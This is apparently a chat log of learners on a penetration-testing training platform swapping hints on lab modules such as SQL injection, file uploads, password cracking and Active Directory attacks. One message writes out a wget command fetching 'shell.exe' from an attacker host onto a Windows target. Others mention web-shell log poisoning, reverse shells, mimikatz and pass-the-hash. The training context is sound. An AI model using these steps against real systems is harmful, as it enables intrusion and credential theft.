I have to locate a flag in the enumerable directory of the site

but the only one I can enumerate is wp-includes which is just... huge

very huge

Am I doing something wrong or the flag is really hide in this mess ?

@dry pumice Yes it's hidden in the mess . Feel free to DM if you need a hint

The same thing happens with my browser. I can enter a URL encoded address, but once the page loads it will sometimes remove the encoding.

DM me 🙂

Word to the wise, I downloaded a wordlist and did not check the contents. It had the HMTL code of the www it was on and not the word list. Caused me two days of headache. Check your downloads!
@sweet heron This is why I was pulling my hair out.

figured out XSS module yay

My account was suspended because I wanted to change my name, I sent a message to support and to whom there is no response

Can someone shed some light on log poisoning via php web shell?

Cannot understand what I am doing wrong when I try to change the User-Agent to a php web shell, it is not showing up in the logs.

@languid fjord hey

Hey I am trying to work on Windows Privilege Escalation Skills Assessment - Part II - I am on the last question and need to find the ntlm hash of the disabled local admin user but I am having trouble when dumping hashes the way I know. Can anyone give me a nudge on this? Thanks.

@severe birch I was able to get it using pwdump

Ok I'll give that a go - thanks

any have issues sometimes getting mysql database login to work on a pwnbox? doing sql injection fundamentals right now and not being able to login

nvm, reset both boxes and it works now 🤷‍♂️

Anyone able to give me a hint on Active Directory Attacks: Skill Assessment 1? I've solved the first three questions but I'm really not understanding how to pivot to MS01 or DC01.

Is the foothold machine dual-homed? You might have to use chisel

Is it me or is the SQL map hard :/

The SQL injection module is harder imo, but since I did i first, I found sqlmap easy. Are you stuck somewhere?

haha kinda skipped it and moved on to command injections for now

I guess the SQL injection has an overwhelming load of text/information

Yeah, but it is a well done module. I learned a lot. Take your time

Yup, thanks for the offer!

Can i get a nudge on command injections?

@summer lake sure, which section / question?

Yooo

Thanks man

I'll pm you

im working on the sql injection fundamentals atm and enjoying it actually. i did sqlmap module first and then going back to this and im having a decent time at it. the module so far is well done.

Hello @west canopy I am trying to update it to enabled in the browser inspector and then click on the button to get the flag and it is still not working after 20 tries. I am wondering if I am doing something wrong?

@agile bloom keep trying, it took me a bunch of tries

understood. appreciate it

there is probably a better way to do it using burpsuite but eventually it will spit out the flag

I got it! Thanks again sir!

np 🙂

I tired the burpsuite route, but was finally able to do it through the browser

if this is agaist the rules then can someone plz tell me but i want someone to try to pull my ip, i would be impressed.

you from turkey?

hey dudes i need late room hints ? pls

Any tip for using sed to delete sections of text between ":". I'm trying to find out the most common password in a list of this format: user : hash : password (no space) for final hashcat skills assessment. I believe sed could help, but it's hard to use.

@sweet heron I did it using a combination of cut, sort, and uniq

I'm looking at cut right now. It's promising!

I've got 84.25% of the hashes for now.

Got it! Ok, cut, now that's a lot more easy to use than sed XD

yes sed is obnoxious lol

Has anyone finished the Password Attacks Module? I am starting to think that most of these password attacks are built to take an obnoxiously long time...

I did and you're right. They sould've put the passwords/users earlier in the lists and maybe have a smaller rule file. You're stuck somewhere?

Yeah working on Password Mutations I was able to make the mutated password list but I now have 92,000+ passwords that hydra has to work through which has already been running for 10+ minutes haha

yup! It takes a bit, but you'll get to it.

at this rate may even run longer then the box has time left for

SQL Injection Fundamentals CRUSHED in simple hours

muahaha

10/10 well explained module

I agree, really fun too.

Hi can anyone give a nudge on the command injection skills assessment? Can't seem to find an attack vector

@summer lake try moving to file to the TMP directory and intercept the request

sorry i don't see any move button..

oh ok

got it

Thanks! @west canopy

They'll get back to youvjust give it time, we unfortunately have to do that stuff for legal reasons

wow this is exhausting.....

Hello all, I'm working on the Information Gathering - Web Edition module and I'm stuck on the Active Subdomain enumeration section question that asks for a TXT record "Find and submit the contents of the TXT record as the answer." Been using dig and nslookup with no luck. Could someone DM me or give me a nudge on this? Think I've been stuck in a rabbit hole for a while now. 😅 I'm able to perform the zone transfer but I don't think I'm looking in the right place for the TXT record.

@primal salmon DM me 🙂

hello can anyone nudge me for the command injection skills assessment? :/

anyone?

oh nvm 🙂

Hello all, I want to crack a pass and I know he must have at least one special char so I want to delete the lines without special ?

I tried that but I don't have enough privileges to run a elevated powershell

still stuck ?

all good. Thank you! 🙂

can anyone suggest me best VPN software for Windows (Free) with easily hand able.

Also Safe....

For the file upload attacks: blacklist filters:

why is it all are 200 success with the same match length?...

I'm doing the Web Service & API Attacks module, and have been having major issues with intermittent connectivity to the target host. It happens when connecting from both the provided VDI instances, and my local workstation over the VPN. It will work for a while, then I won't be able to connect at all for a few minutes. Resetting the target doesn't help.

try chatting with the support team they will help u

still having issues

oh its their server issue?

idk send me ur payload list

dm

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/web-extensions.txt

anyone around thats done the command injections module? i think im stuck on the last section before the skill assessment

Writing files?

no its the Advanced Command Obfuscation section

oh oops, haven't done it yet.

F

Im having trouble copy and pasting inside the workstation :(

I dont know why but whenever I try using ssh it wont let me type or paste anything in the password part

in bash?

yeah

does it give you a seperate password field after you input the other ssh information?

ssh htb-student@ip
htb-student's password:

it wont let me type anything after that

ok it will not show you the password for security reasons while you are entering the password

^^^^

so its there?

and its just invisible

yup

ahhh that makes so much sense

bash is nice that way

for security

thank you :D

Hello guys, can anyone help me? I'm stuck in last question of the File Inclusion module

what wordlist you use on ffuf assesment? I've tried a couple and can't get the third question, so stuck

Depends on what to fuzz. I used the lists they talk about in the module: burp-parameter-names.txt, default-web-root-directory-linux/windows.txt, web-extensions.txt, directory-list-2.3-small.txt

Yes I can probably help, where are you stuck exactly?

@rough pelican Try recreating the example "Viewing Sticky Notes Data in Powershell"

Feel free to DM me if you still need help 🙂

Yes, directory-list-2.3-small.txt should work

Hi! Literally I can’t answer the first question on debugger path- 🤦‍♀️I got an output with curl but it just says it’s been moved in the output. Am I just misunderstanding what they are looking for??? SOS.

@sacred arch which module / section?

Tadaa! Basic Toolset completed!

@west canopy did you get the MS01 access? I'm stuck..

@shadow verge not yet. I am reading through the module again. I feel like it's going to be something from these sections:

I think there was no trusts regarding bloodhound

I'll check with powerview too, this is hard assessment

Right, to run a local bloodhound collector we need to be connected as a domain user. I also tried running Bloodhound-Python with the sql user's credentials but that didn't work either.

I ran bloodhound on system, but there was bug first

so i can't run it

but then i mentioned it to mrb3n and now i can run sharphound there

locally with system privs

ohhh interesting

i thought that was intended

yes it was because active directory web services was not running

Yea the Import-ActiveDirectory powershell cmdlet was not working for me either

or whatever it's called

But PowerView was working fine

yep

I'm a little confused. Because the initial target does not have LDAP enabled. For stuff like bloodhound , does it gather data via querying the domain controller?

Yes I think it does, not sure tho

Get-DomainTrust and Get-DomainTrustMapping does not give any output on powerview

I found cached credentials for administrator@INLANEFREIGHT.local domain account but can't crack it

with mimikatz

ah

i was thinking it had to be password re-use or something

maybe use Enter-PSSession to access the other machines with a different domain account but re using the sql user's password

Yes it is hard to use the pssession without fully interactive shell

I still need to try it. I'm not using the web shell though, first thing I did was upload a netcat executable so i could have a terminal based shell

I used meterpreter

but it did still not function properly

does meterpreter hashdump command work?

also how did you get a meterpreter shell?

no but i get the full dumps from mimikatz

I just used web shell wget http://attacker.ip/shell.exe -o C:\windows\temp\shell.exe

and ran the shell with C:\windows\temp\shell.exe

ah nice

I wonder if the local admin ntlm hash is reusable in the internal machines

I don't know how to login with NTLM from windows so I don't know

right , i can't think of any way to pass the hash in this scenario

PsExec.exe would work if you guys can get RDP access

You can try to pass the admin hash and execute cmd.exe

oh

thanks @west canopy @sweet heron those little nudges help me from going completely insane. I love this stuff!

Web Proxies - Skills Assessment I am stuck trying in to set up the request to properly take the cookie and not return errors. I have mirrored the example above and my encoding is matching up to 88 characters for all entries, but I am only getting either all 200 matches or all 400 matches. Any help would be greatly appreciated

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

@agile bloom DM me 🙂

@gloomy sigil DM me 🙂

Can somebody give me an example of SQL injection on an API endpoint, for example Web service and API attacks >> Information Disclosure >> Q2. I’m sure its super simple, but for whatever reason I am not getting anywhere with and my brain is friggin fried

Hi, I'm doing the 'web requests' POST but I'm blocked I think I'm close to the end but do not know where to go

@final salmon DM dawg i got you

@open spruce i got you too dawg hit me up

@west canopy Thanks for the help 🙂

Web requests first section 🙃

Ugh I hate this web requests section. So i'm at the skills assessment part where I'm trying to fuzz the last character of the md5 cookie but i'm going nowhere. I'm wondering if i'm not re-encoding it right or what

password attacks

was this a user error or problem with the module? I'm in the same boat, I've reloaded the page a few times and watched the requests

@sacred arch have you tried running curl against the target?

@round lagoon Feel free to DM me and i can show you how to do it 🙂

ok burp is just weird, got it thnx 🙂 🙂

@silver laurel I did as the guide told me, but I'm not rulling out error ID-10-T lmao

😦 lol yeah maybe but I’ve read through the headers as well and I don’t see anything.

Has anyone been able to get the flag for: https://academy.hackthebox.com/module/35

The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.

Thanks @mortal basin for the excellent "command injection" module, I really enjoyed it 😃

use curl, also read the section on request headers

hi, anyone can give me some nudges on skill assessment for broken authentication?

Hey, can someone give me some hints for the skill assessment for command injections. Stuck since 3 Days😅

Anyone able to answer an assembly question (Intro to Assembly Language - Conditional Branching)? Got the code to stop looping but my answer to the question is apparently incorrect

Nevermind, got it. I was misunderstanding what hex value the question was asking for

sure, you can DM

So I seem to be banging my head against a wall here for web requests HTTP if someone is willing to clue me in on some things, I’ve already gotten further then I have been now I’m just stuck

I’m stuck there also but I csn see the flag.txt attachment but I can’t seem to extract it

are you still stuck? If so, dm me

Can anyone help me with this: The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt"

I can't seem to run the bash script

bash script worked for me fine

just copy and paste it

yeah it worked now

idk how i ran it...

suddenly appeared in my folder.

But thanks @leaden quail 🙂

can anyone help with file uploads pls?

dm

still need help ):

hello in Active Directory Enumeration & Attacks
page LLMNR/NBT-NS Poisoning - from Linux
i cant crack the hashes that responder gave me hashcat keep on saying exhausted i use rockyou wordlist
my command : .\hashcat.exe -a 0 -m 5600 .\hashes\XXXXXXX.txt .\wordlist\rockyou.txt

it looks like the hashes in the wley.txt file aren’t formatted right so Hashcat is erroring out

yeah i am trying to upgrade responder on the vm that htb provide

to see if that help

it changed nothing

the top one is the new one

so updating responder did change something but i still cant crack it

Try letting responder run a little bit longer and see if you get any other hashes from different users.

i will try again

Hi My friend,
I try to solve chalange "Bruteforcing Cookies" from "Broken authentication" module.
in question 2, we should try decode cookie after login with htbuser:htbuser. I can not understand, how to detect type of cookie algoritm encode and then decode it.
example cookie: 5s4539pp9etrtf6hlhg04o4ob8
plz help me.

sorry havent bought the module yet

i keep on getting exhausted

It seems to me that the hash file is not valid

Maybe you have more than one line? A bad copy paste?

oh shit it worked

it only work on 1 hash

GJ 🙂

it works

To fix this issue for anyone facing the same : I installed the latest cuda driver on my host, used the latest responder ( downloaded from github ) the one on the box give different hashes, make sure the hash is on 1 line after copying ( no spaces ).

also thanks on mrb3n, Itnbob for the response

Hi, I need help with the Password Attacks module section Skills Assessment. In the first lab (Password Attacks Lab - Easy), I couldn't even brute force anything because it took me 3-4 seconds to send 1 request. I let it run for like 80 minutes, and it was able to brute force 8 users. Am I doing anything wrong? For the second lab (Password Attacks Lab - Medium), I did manage to get the zip file, but after extracting the hash, I couldn't crack it. I try every wordlist I have (rockyou, fasttrack, hashkiller-dict, ..)

dm

Anyone I can dm for the file upload attacks skill assessment?

Plz help me

guy i need help on windows file transfer

@gray cypress are you checking the box for "remember me" when logging in? You want to decode the HTBPERSISTENT cookie

@rough pelican Try running the powershell command to view sticky notes

Send screen shot

anyone got a hint for finding CT059 credentials in AD Enumeration and Attacks Skills assessment Part 2 ?

@shadow verge Were you able to finish assessment Part 1?

Yes

Any chance I can shoot you a DM?

Yep

DM me

Can you guys help me with the ssh practice on the academy? Im hard stuck there hehe

Anyone mind helping me out with the SQLMap Essentials Skills Assesment?

Where are you stuck?

@CryptoAnar84 Skills assessment flag. I have a hypothesis a POST request needs to be exploited, but can't figure out the parameter. I have been using burp to help gather information.

I did that section a while ago, but my notes are not great - if you are desperate, send me a DM and I will try to help

It is a post request indeed. You'll find the vulnerability is made in json. Check around the shop page. You'll know when you find it.

I found it, but I am missing something. Tried WAF bypasses, etc. Do I need certain formating because it is jason?

No, you just have to fine tune your sqlmap command. Check the bypassing section. You'll need some bypass options and carefully check the output of the command.It will also suggest ways to bypass some restrictions.

for the XSS - Phishing module, did anyone else have issues with using port 80 like it says? I've tried other ports but not working

I'm at defacing section rn, will let you know when I get there.

thank youuuu

i think something may be using port 80 for listening but i looked at ss -ntlp and theres no service to shut down

Hello guys, can someone help me with a in issue? Im stuck at the "Information Gathering - Web Edition" - Active Subdomain Enumeration, and each time i try to use the nslook tool to scan the domain "inlanefreight.htb", it returns me this message "** server can't find inlanefreight.htb: NXDOMAIN **"

I've allready add the vhost to the /etc/hosts file, and nothing seems to work

Hello, need help for the Q3 - Skills Assessment - Information Gathering, i tried a lot of thing but idk impossible the submit the right NS

for the skill assessment in command injections im trying to figure out which part of the webpage is my injection point, can i get a hint?

I am working on Tier 1 - Responder and I can not get the web page to open. I have a pi running pi-hole with a recursive dns server. I am assuming that is the reason. Anyone else run into this?

It worked fine for me. Might be on your end.

If anyone else runs into this, go to Pihole/admin/cname_records.php. I added an entry Domain: IP address, Target: unika.htb

why i cannot write on other chanels. how do i know if i get banned?

Looking for some friendly guidance on Web Services and API attacks module assessment. If anybody is available?

DM me what you have so far and I will see if I can help you.

Try adding it to /etc/resolv.conf too.

yeah im hardstuck now on this skills assessment for command injections someone please help

In the session hijacking section in the XSS module, the target's registration page doesn't work: nothing happen when I click on "register"

I've allready did it, but it doesn't work neither

have you tried moving a file to tmp?

i figured it out with some assistance

i figured out the injection point but was stuck on not really receiving additional feedback from using commands

but got it figured out

ah i see, nice!

i'm still stuck on the file upload attacks skill assessment 😅 but doing another module for now

thats the next module ill be doing also

probably starting it tmrw

anyone else having connectivity issues? or is it just me?

Did they changed the answer of command injection module, identifying filters? The character that fits the answer is blacklisted for me. Another one is not blacklisted...

Ok, I see its url encoded version is working, but the & still works (but not its encoded version). So there are two good answers, right?

Finally - I've completed the "Starting Point' content, and now I'm starting the 'Beginner Track". Does this still use the 'Starting Point' VPN, or do I need to disconnect and download another ovpn file?

Yes, starting point boxes use their own VPN file . While live and retired boxes use a separate VPN file.

@spice olive DM me 🙂

@plucky bobcat Feel free to DM me as well !

Information Gathering Web-Edition: Subdomain enumeration. I have been stuck on this section for a while. Help would be appreciated.

dm

hi guys, is xss able to search for files ? like cat flag.txt

ty

Xss can lead to rce -e.g. CVE-2021-37794- From XSS to RCE -or htb retired machine CrossFit-. The retired book machine has an example XSS Fileread

thanks !!

My account was suspended because I wanted to change my name, I sent a message to support and to whom there is no response now i have 3 days I emailed technical support, what do I do?

It's been the weekend

You'll probably get a reply tomorrow because it's bank holiday today

It's Holiday for AU as well today. @jagged zenith waht do you mean email?

We have a bubble chat support

But i send support before 3 days

What do you mean?

I sent to support on April 29th

In order to solve this problem

But it has not been resolved

Create a support ticket rather email.

How that

Okay i create a support ticket

could I please get some help with Broken authentication module weak bruteforce protections second question?

DM

Can someone help me with the Web Attacks module in the Blind Data Exfiltration section. The tool XXEinjector doesn't get anything out and when I work with Burp and the PHP script I don't get a response from the server.

can someone help me please in File Upload Attacks Skills Assessment - File Upload Attacks?

i cant find the path for uploaded files

Hi
thank you for hint. i forgot to check box "remember me"

gm academy

Afternoon all, I'm on Nmap Enum. What is the best way to enum FTP, SMB, SMTP and Shares?
Are the nmap scripts the best only way?
i.e. nmap -p 445 --script smb-enum-shares <IP>

Good morning. Whose ready to finish some Modules? 💪💪💪

Hi yaoi74, are you able to help with my question above? I'm on the Nmap Enum Module

Yes, but I am busy so it may take me some time to help you out. Feel free to dm.

hello everyone

who can give me a hint with this AD question:
What AD object handles all authentication requests for a domain?

Think of it as a two stage attack. The first goal is to compromise the source code, the second goal is too get RCE via file upload attack. Feel free to DM me.

I tried some with no success

If you read the section your answer is there.

or I really don't know read or .........

has anyone done the windows buffer overflow module? Im on the skills assessment but the program I download just comes up a black screen.

Same here. I can't find the member of Remote Management Users group. Did you succed in the end ?

VM

the 2nd option is what I though from the beginning but LoL "s" made me crazy

I run a Kali VM. I did install most of the tools myself except for powershell which I have not really needed much.

looks like powershell is installed in kali by default

I dont lose internet

My vpn is connected all the time and I still have full access

no

I also dont use virtual box

My VM runs on a hyperv server

one network interface, NAT enabled

@lethal atlas come over to the dark side and use Parrot 😉

LOL

I have considered it but the time it would take to move all my tools and notes....ugh

ya transferring everything is a pain

hey @blissful verge can you tell me if the win32bof.exe file from windows buffer overflow is supposed to only open a black screen?

is that the skills assessment?

yes

yes its intended to just print errors

ok I was just making sure there wasnt something wrong on my end. Thank you.

no problem!

Am I the only one who finds windows stuff too overwhelming? I am doing AD (Tier 0 one) now and I can't fit so much terminology and stuff in my head anymore. I hope I can get better one day

TBH, I despise windows.

And I work in an AD environment

How am I wrong?

hello group, sort of stuck or puzzled. on intro to bash, comparison, I successfully wrote the script down to the end and used tail -c 20 to print the last characters and get 15 lines, which I have no idea where the answer the module is looking for is within these lines?? please any guidance would be appreciated. thanks

one word

dm me

Umm still confused 😄

Ahh I am so dumb

it said messages in the question so I don't have to repeat it in the answer

Hey i just started learning htb after i was told to try and learn using it after doing some picoCTFs and having fun doing them. Is there some other stuff i should learn before getting into this, im on the getting started module after finishing the tutorial one, and i feel dumb and dont understand alot of what its talking about

i dont know what any of this means, is there somewhere else im suppose to learn first before getting into htb?

@plucky plover Honestly most of that stuff isn't too relevant imo, just an overview of the different file types for Virtual Machines

ISO is what we used to burn to physical media like CDs or DVDs. You can still mount them virtually, and click all the installation options as if you were installing it on bare metal.
OVAs are pre-built virtual machines that you just double click and go, change your password, check for updates, and you're set. Definitely the easier way to get started, unless of course your goal is replacing one operating system within an entirely different one. But unless this is a secondary computer, I highly recommend against using a security focused distribution as your main OS.

so an OVA is like what im using, vmware with kali linux?

Exactly, a pre-built virtual machine that has all the defaults and whatnot configured for you out of the box. Definitely the way to go, as snapshotting and rolling back the machine is a whole lot easier than having to do a wipe and load of your entire computer.

The V is for virtual, and the A is for appliance. I am drawing a blank on what the O is for.

Operating maybe?

idk

oh open

But you can also build your own virtual machines from scratch. One of the retired HTB machines actually required something to be done in Windows, and I remember in the IppSec video he did it in a brand new windows virtual machine. Microsoft will actually let you download Windows virtual machines with a 30-day license for free. Great for temporary projects.

Yeah, open, I should have guessed that.

So if an iso is on cds or dvds are those even used anymore? Most computer dont even come with places to put them anymore

Think of an ISO as more like a really big zip file. In fact, if you have 7zip installed on your machine, you can literally open up an ISO with it and see what is contained within.

Software like brasero, or command utilities like dd can be used to write out the contents of an ISO to an optical media. However, VMware and virtual box can also be pointed to an ISO file on your hard drive, and mount it as a virtual drive.

For instance, if you ever wish to play with a RaspberryPi computer, the instructions on how to get the operating system onto the micro SD card will involve using an ISO file as well. Of course in that instance, you will be using dd to extract it to an SD card, instead of a CD or DVD.

So an ISO is a file while an OSA is an application? Sorry im really confused

By the way, when learning hacking/anything IT related, if you don't understand something you should google it first. Will save you a lot of time

I like to think of ISO as a format used to save operating systems so you can download and install them. While not being true it still applies in most cases.

im too dumb to solve the first interactive section of the academy 😦

No way! To prove it, you were smart enough to say something in the chat. The dumb ones would have given up and walked away. What section are you working on?

i misspelled the answer lmao. im now starting with linux fundamentals. 🙂

Haha! Been there, done that.

yeah i will se how it will work...

i can skip things like history of linux right?

I don't recommend skipping anything haha. You never know when the knowledge might come in handy.

this is gonna be fun. english isnt even my mother language 🥶

i agree

Anyone able to give me a hint on Active Directory Attacks Skill Assessment II ? "Submit the contents of flag.txt on the Administrator Desktop on the SQL01 host". I was able to connect using mssqlclient.py , and can enable xp_cmdshell, but I still don't have permissions to access the flag.

Edit: Solved!

Stupid question on this "Introduction to Web Applications" module. The question is: What is the CSS "property: value" used to make an HTML element's text aligned to the left?

As a programmer, I am tempted to use p{text-align:left;} (since p is a HTML element), but the module marks this as wrong.

Or if you want to define the entire HTML document, you would use <html><style>p{text-align:left;}</html></style>

Finally got it! Thanks to everyone who helped me along the way @west canopy @lethal atlas. Was a fantastic voyage lol https://academy.hackthebox.com/achievement/443515/path/17

@final salmon now we just gotta take the exam!

@west canopy yeah lol terrified!

me too

makes 3 of us

@west canopy @final salmon @lethal atlas you 3 got this. Study up and jump in to the exam!

@unique valve IM beefing up my skills. Just participated in Nahamcon and our team is looking forward to Cyber Apoc..

we came in 237 out of over 4000 so not bad.

can anyone assist with a reverse shell?

I will sure try

for some reason cant get pentestmonkey's reverse shell working and i think im messing up something obvious

is nc supposed to be on 0.0.0.0?

listening? yeah thats ok

ok and i altered the file already

and im connect to academy via openvpn

so im using that in the file

what module and are you working on

file upload attacks first section

2nd section*

its just doing a simple reverse shell via a file upload site

bypassing filters?

doesnt have any

its like the very first reverse shell they show to understand the concept